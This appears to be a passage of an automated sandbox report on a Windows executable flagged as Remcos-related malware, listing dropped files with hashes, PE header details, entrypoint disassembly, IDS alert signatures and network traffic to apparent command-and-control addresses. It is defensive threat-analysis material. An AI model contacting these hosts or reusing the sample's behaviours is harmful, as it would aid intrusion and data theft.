                                                Preview:MDMP..a..... ..........g............$...............,............4..........T.......8...........T.......................................................................................................................eJ......l.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFDE.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.718198413214661
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2k6lNHcYKaWpBw89bxLqsfabm:R6lXJV6lNHcYKPxLJfv
                                                MD5:D31EBD5E741BEFCB9214DC782731BE28
                                                SHA1:49B36B8ED0CC7A553C7769EF1D991AF03640BF5C
                                                SHA-256:F37524A05B45BBA8E3AE670E942C079DDAB908201B46CC054DA435D1D4DDBCCA
                                                SHA-512:9B01F610B354130F67969FF939A6317CA6B3A2C19B5B291A2676344F4975493A9F71BA99C4BF7A6BA0B03E424CCFAADB56BD563FA7415CD7678AA400D9FF25AB
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE02D.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.469467794250785
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYbYm8M4JStF/+q8vzk38Rqhd:uIjfxI70g7V/JoKw38Rqhd
                                                MD5:C4B4D402E35C21D995229EEDB29CDA54
                                                SHA1:55762E2A8957AE501DF952A5DF4194C308BB2ADC
                                                SHA-256:B37F1B2DAC7D6CCECC22B2477AFF6D81DD98D9ADE8347666C53493EF6388C19F
                                                SHA-512:EF2062AF4AD3C9D032C129547B1857DCDD55FA9432D1101EAA1CC2D39ED0927EC7BFD1562EDF4FE8BBA28821888F52DD5F77A4FF52D88DDD5740ACB4DBAC1CDA
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE58A.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:55 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):87020
                                                Entropy (8bit):2.198018791753391
                                                Encrypted:false
                                                SSDEEP:384:M+rTbFxtgI2JdiQSJXj51QdoL3bVIZj2Mh0/t+vMFJIeI:M+rfPtgI2JdeJN1+oLLij2Mq1+cu
                                                MD5:150FD88B1D9C1C43129485688A83143D
                                                SHA1:FF2E35CC3CF9129018BBD30559A4CC46D2F606FE
                                                SHA-256:CF13CCCE1F9DBF7D367B565FEBCF641C4CBD7A1EA0E61402FB3AE3F4D568275F
                                                SHA-512:0337C8196AE1CFBAA16DB784CECFA7B27F76051054A1EEE7917E7668C1BA54D10B34EB504BD4E7478E150CA14BDDDBF3626052EE303CCCA7C8B38D5060A27BF7
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................d=..........T.......8...........T...........x$..t/..........d...........P...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE656.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6392
                                                Entropy (8bit):3.720906822864488
                                                Encrypted:false
                                                SSDEEP:96:RSIU6o7wVetb2CA6Hcs9NYonpFX0Ykbu5aMOUT89bjLqsfeBm:R6l7wVeJ2968s3YKaWpBT89bjLqsfeBm
                                                MD5:44D8CE403297E341E337839B03A36B9A
                                                SHA1:4AFD99E83CDBAF458B2215C8B5A4569E6AEDD584
                                                SHA-256:A30823B85AE0D6E80C33FDFB7601577EC998D550268A218FCB27D8D100911AC8
                                                SHA-512:1FE16640A3CE5EA7AF92394462CD3892FEB81C6DC8E45BF8B67C981F95B8F2C3FB98F8D64CD1AD85F806FD7746237CF1BDDF6C775B04D36FD786A3EAF0104214
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERE686.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.466408546097961
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYhYm8M4JStFXsC+q8vzk38Rqhd:uIjfxI70g7VFJAKw38Rqhd
                                                MD5:31DD061AC706E5A5BF55E88DB15AAC67
                                                SHA1:04528F89B63DC1B043F304A2B3B87AD16DF2BCCE
                                                SHA-256:6E8DCB613501AA6FCC90D091B2D3DB34FAA9D03CA6B74642819CF6601446C640
                                                SHA-512:00106CDB24ABAD3F3FC5DC2548CA3226D940EB08FE181C9123A8447ADB374154A46F20C38C3927823390CD1BB45CE194B0410E987F74CED96EFB7F8C799B5283
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\xenor\yavascript.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):963
                                                Entropy (8bit):5.019205124979377
                                                Encrypted:false
                                                SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:B62617530A8532F9AECAA939B6AB93BB
                                                SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                C:\Users\user\AppData\Roaming\xenor\yavascript.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):397312
                                                Entropy (8bit):7.59779116665988
                                                Encrypted:false
                                                SSDEEP:6144:pvesyWj0MhFpikvYFmSkoxT88KaUqcZLROqNwlggoWLOEC:pesyY0M3xvYDY8KgchIvlgXWy
                                                MD5:A0ACD7920F09A59331E008F8D3DC7AC1
                                                SHA1:F6BF51B2BCCC91476136E43A91B17076ED78B083
                                                SHA-256:4D8F242A1D64B3B41748D2BD56EE6F7119434DEDCDF793A83CEA95FB31D13347
                                                SHA-512:10AA260961DF5472B9B79A72FB9AB1A4EA9C088C817DB107F9355FBB7B6B3369B17127933EAD6B10A01E4270E3F533E37699EEB77DD084D8821D47C5FC5C870E
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'...I..I..I.....I.....I....".I.d2..I..H..I.....I.....I.....I.Rich..I.................PE..L...LB.d.................p..........JK............@.........................................................................<v..P....0...:..............................................................@............................................text...zo.......p.................. ..`.data............`...t..............@....rsrc........0...<..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\xenor\yavascript.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\yPIOW6yoPi.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.471256298754677
                                                Encrypted:false
                                                SSDEEP:6144:wzZfpi6ceLPx9skLmb0f9ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNWjDH5S:mZHt9ZWOKnMM6bFpIj4
                                                MD5:C84AF8F2EAA7444133C6C36476D0E913
                                                SHA1:9FCFCA2ED566048516D46EC54228A1D4B61F3750
                                                SHA-256:96CA419B052BCB7F7100D6A5CD1922A11AC6D5E21CCFF99E1FFC4EFE7340E96A
                                                SHA-512:E292B36A793D1C4E21B586D3725979332DAF8D1AB0657EBC235310E109C5234F3498BF6E68D679632A9DF08CF46C4B66AF44B52B1CBBF3E3C5B1D3B8CBA6AFE8
                                                Malicious:false
                                                Preview:regfS...S....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..o.c.................................................................................................................................................................................................................................................................................................................................................[........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.59779116665988
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:yPIOW6yoPi.exe
                                                File size:397'312 bytes
                                                MD5:a0acd7920f09a59331e008f8d3dc7ac1
                                                SHA1:f6bf51b2bccc91476136e43a91b17076ed78b083
                                                SHA256:4d8f242a1d64b3b41748d2bd56ee6f7119434dedcdf793a83cea95fb31d13347
                                                SHA512:10aa260961df5472b9b79a72fb9ab1a4ea9c088c817db107f9355fbb7b6b3369b17127933ead6b10a01e4270e3f533e37699eeb77dd084d8821d47c5fc5c870e
                                                SSDEEP:6144:pvesyWj0MhFpikvYFmSkoxT88KaUqcZLROqNwlggoWLOEC:pesyY0M3xvYDY8KgchIvlgXWy
                                                TLSH:3C840292B9A0C031D4AA25B10830CFE16ABF7E726678A54F7B5527BD5F312C3563A343
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........'...I...I...I.......I.......I.....".I..d2...I...H...I.......I.......I.......I.Rich..I.................PE..L...LB.d...........

                                                File Icon

                                                Icon Hash:0ca3032505099544

                                                Static PE Info

                                                General

                                                Entrypoint:0x404b4a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x64C8424C [Mon Jul 31 23:22:52 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:321f975ee8f8e533eb0cddbd63fede6f

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F9BB0B3E60Fh
                                                jmp 00007F9BB0B39C8Dh
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                call 00007F9BB0B39E4Ch
                                                xchg cl, ch
                                                jmp 00007F9BB0B39E34h
                                                call 00007F9BB0B39E43h
                                                fxch st(0), st(1)
                                                jmp 00007F9BB0B39E2Bh
                                                fabs
                                                fld1
                                                mov ch, cl
                                                xor cl, cl
                                                jmp 00007F9BB0B39E21h
                                                mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                fabs
                                                fxch st(0), st(1)
                                                fabs
                                                fxch st(0), st(1)
                                                fpatan
                                                or cl, cl
                                                je 00007F9BB0B39E16h
                                                fldpi
                                                fsubrp st(1), st(0)
                                                or ch, ch
                                                je 00007F9BB0B39E14h
                                                fchs
                                                ret
                                                fabs
                                                fld st(0), st(0)
                                                fld st(0), st(0)
                                                fld1
                                                fsubrp st(1), st(0)
                                                fxch st(0), st(1)
                                                fld1
                                                faddp st(1), st(0)
                                                fmulp st(1), st(0)
                                                ftst
                                                wait
                                                fstsw word ptr [ebp-000000A0h]
                                                wait
                                                test byte ptr [ebp-0000009Fh], 00000001h
                                                jne 00007F9BB0B39E17h
                                                xor ch, ch
                                                fsqrt
                                                ret
                                                pop eax
                                                jmp 00007F9BB0B3E7CFh
                                                fstp st(0)
                                                fld tbyte ptr [0045869Ah]
                                                ret
                                                fstp st(0)
                                                or cl, cl
                                                je 00007F9BB0B39E1Dh
                                                fstp st(0)
                                                fldpi
                                                or ch, ch
                                                je 00007F9BB0B39E14h
                                                fchs
                                                ret
                                                fstp st(0)
                                                fldz
                                                or ch, ch
                                                je 00007F9BB0B39E09h
                                                fchs
                                                ret
                                                fstp st(0)
                                                jmp 00007F9BB0B3E7A5h
                                                fstp st(0)
                                                mov cl, ch
                                                jmp 00007F9BB0B39E12h
                                                call 00007F9BB0B39DDEh
                                                jmp 00007F9BB0B3E7B0h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push ebp

                                                Rich Headers

                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5763c0x50.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x3a10.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x2ee00x18.text
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2e980x40.text
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x190.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x56f7a0x5700008c4816808d171190b4258aa3969cf67False0.9045859150502874data7.875500118800945IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .data0x580000xaba80x6000cb7d393e431e25bf07903ec367256258False0.0806884765625Matlab v4 mat-file (little endian) n2, rows 2, columns 00.9660636451204884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x630000x1ba100x3c002d7812dc3b9e84c8ab17f99a0b23a768False0.5729166666666666data5.137179330881923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x631e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.5702764976958525
                                                RT_ICON0x638a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.595954356846473
                                                RT_ICON0x65e500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.6542553191489362
                                                RT_STRING0x665700x49adataRomanianRomania0.4456706281833616
                                                RT_ACCELERATOR0x662e80x50dataRomanianRomania0.825
                                                RT_GROUP_ICON0x662b80x30dataRomanianRomania0.9375
                                                RT_VERSION0x663380x238data0.5246478873239436

                                                Imports

                                                DLLImport
                                                KERNEL32.dllWriteConsoleInputW, SetComputerNameExA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, OpenEventA, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, SetCalendarInfoA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
                                                ole32.dllCoSuspendClassObjects
                                                WINHTTP.dllWinHttpCheckPlatform

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                RomanianRomania

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-11T06:12:49.237371+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649753198.23.227.21232583TCP
                                                2025-01-11T06:13:01.128869+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649828178.237.33.5080TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 11, 2025 06:12:48.524591923 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:48.529390097 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:48.534421921 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:48.547782898 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:48.552572966 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.119278908 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.237370968 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:49.249448061 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.424896002 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:49.603913069 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:49.608863115 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.608923912 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:49.613780975 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.613840103 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:49.618835926 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:49.885569096 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:50.034382105 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:50.209534883 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:12:50.424792051 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:53.096102953 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:12:53.100992918 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:13:00.490282059 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:13:00.495186090 CET8049828178.237.33.50192.168.2.6
                                                Jan 11, 2025 06:13:00.495882034 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:13:00.498894930 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:13:00.503700972 CET8049828178.237.33.50192.168.2.6
                                                Jan 11, 2025 06:13:01.126374006 CET8049828178.237.33.50192.168.2.6
                                                Jan 11, 2025 06:13:01.128869057 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:13:01.358242035 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:13:01.363092899 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:13:02.133907080 CET8049828178.237.33.50192.168.2.6
                                                Jan 11, 2025 06:13:02.133995056 CET4982880192.168.2.6178.237.33.50
                                                Jan 11, 2025 06:13:03.541266918 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:13:03.596714020 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:13:03.950376034 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:13:03.955249071 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:13:33.688739061 CET3258349753198.23.227.212192.168.2.6
                                                Jan 11, 2025 06:13:33.737449884 CET4975332583192.168.2.6198.23.227.212
                                                Jan 11, 2025 06:13:34.054111958 CET4975332583192.168.2.6198.23.227.212
